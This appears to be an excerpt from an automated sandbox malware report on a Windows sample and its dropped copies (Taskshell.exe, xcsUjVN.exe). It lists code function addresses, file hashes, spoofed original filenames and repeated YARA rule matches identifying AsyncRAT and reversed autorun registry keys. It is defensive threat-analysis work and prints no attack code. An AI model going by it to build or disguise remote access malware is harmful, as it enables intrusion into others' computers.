Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C5F8 22_2_0704C5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043451 22_2_07043451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043460 22_2_07043460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047479 22_2_07047479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047488 22_2_07047488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C119 22_2_0704C119
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C123 22_2_0704C123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042150 22_2_07042150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042160 22_2_07042160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_070471E9 22_2_070471E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_070471F8 22_2_070471F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047078 22_2_07047078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047088 22_2_07047088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07045E08 22_2_07045E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07045E18 22_2_07045E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043E5F 22_2_07043E5F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AEE2 22_2_0704AEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AEF0 22_2_0704AEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07044D4F 22_2_07044D4F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07046C62 22_2_07046C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07046C68 22_2_07046C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AC88 22_2_0704AC88
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07044C91 22_2_07044C91
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AC98 22_2_0704AC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042BB1 22_2_07042BB1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704BA3F 22_2_0704BA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AA38 22_2_0704AA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704BA38 22_2_0704BA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AA48 22_2_0704AA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B070518 22_2_0B070518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B077D48 22_2_0B077D48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B0759D8 22_2_0B0759D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073880 22_2_0B073880
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073890 22_2_0B073890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B074F68 22_2_0B074F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B07050A 22_2_0B07050A
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073425 22_2_0B073425
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073458 22_2_0B073458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073CC8 22_2_0B073CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_0145A808 33_2_0145A808
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01450518 33_2_01450518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_014559D8 33_2_014559D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453880 33_2_01453880
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453890 33_2_01453890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01450508 33_2_01450508
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453458 33_2_01453458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453425 33_2_01453425
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453CC8 33_2_01453CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01454F68 33_2_01454F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA7B0 33_2_05BAA7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC128 33_2_05BAC128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BABA48 33_2_05BABA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC5F8 33_2_05BAC5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC5E8 33_2_05BAC5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA4D70 33_2_05BA4D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAC98 33_2_05BAAC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAC92 33_2_05BAAC92
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7488 33_2_05BA7488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA4C8F 33_2_05BA4C8F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7479 33_2_05BA7479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA6C68 33_2_05BA6C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA6C62 33_2_05BA6C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3460 33_2_05BA3460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3451 33_2_05BA3451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2C40 33_2_05BA2C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA730 33_2_05BAA730
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA752 33_2_05BAA752
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAEF0 33_2_05BAAEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAEE2 33_2_05BAAEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA5E18 33_2_05BA5E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA5E08 33_2_05BA5E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3E60 33_2_05BA3E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7658 33_2_05BA7658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3E5E 33_2_05BA3E5E
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7652 33_2_05BA7652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA71F8 33_2_05BA71F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA71E9 33_2_05BA71E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC123 33_2_05BAC123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2160 33_2_05BA2160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2150 33_2_05BA2150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7088 33_2_05BA7088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7078 33_2_05BA7078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2BA8 33_2_05BA2BA8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAA38 33_2_05BAAA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BABA3F 33_2_05BABA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAA48 33_2_05BAAA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0141D304 37_2_0141D304
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA7B0 37_2_072DA7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3E60 37_2_072D3E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4D70 37_2_072D4D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2C40 37_2_072D2C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DBA48 37_2_072DBA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC128 37_2_072DC128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA730 37_2_072DA730
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA75A 37_2_072DA75A
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D5E08 37_2_072D5E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D5E18 37_2_072D5E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3E5F 37_2_072D3E5F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7658 37_2_072D7658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7652 37_2_072D7652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAEE2 37_2_072DAEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAEF0 37_2_072DAEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4D4F 37_2_072D4D4F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC5E8 37_2_072DC5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC5F8 37_2_072DC5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D6C68 37_2_072D6C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3460 37_2_072D3460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D6C62 37_2_072D6C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7479 37_2_072D7479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4C70 37_2_072D4C70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3451 37_2_072D3451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7488 37_2_072D7488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAC88 37_2_072DAC88
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAC98 37_2_072DAC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2BAB 37_2_072D2BAB
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DBA3F 37_2_072DBA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAA38 37_2_072DAA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAA48 37_2_072DAA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC123 37_2_072DC123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2160 37_2_072D2160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2150 37_2_072D2150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D71E9 37_2_072D71E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D71F8 37_2_072D71F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7078 37_2_072D7078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7088 37_2_072D7088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07910518 37_2_07910518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791A808 37_2_0791A808
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07914F68 37_2_07914F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791050B 37_2_0791050B
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913CC8 37_2_07913CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791341D 37_2_0791341D
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913458 37_2_07913458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_079159D8 37_2_079159D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913890 37_2_07913890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913880 37_2_07913880
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Taskshell.exe 5A283F2F193BD78816D21CC62D0BB67A5570BC631F5C3752444ABC28515E542C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\xcsUjVN.exe 5A283F2F193BD78816D21CC62D0BB67A5570BC631F5C3752444ABC28515E542C
Sample file is different than original file name gathered from version info
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000000.1695994724.0000000000F72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1754412777.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1758132050.0000000003100000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1762564281.0000000004C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000009.00000002.1790797223.000000000040E000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000009.00000002.1797105596.0000000004084000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Uses 32bit PE files
Source: PXUVmodpCYqRIPQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
